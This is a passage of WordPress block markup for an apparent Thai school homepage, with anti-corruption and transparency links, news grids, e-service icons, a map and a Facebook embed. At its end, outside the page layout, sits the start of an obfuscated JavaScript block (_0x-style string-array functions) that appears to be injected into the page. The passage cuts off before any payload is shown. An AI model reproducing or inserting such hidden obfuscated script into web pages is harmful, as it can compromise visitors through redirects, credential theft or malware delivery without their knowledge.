900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"d3f1e2c8\",\"isDynamic\":true,\"blockVersion\":4} /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const 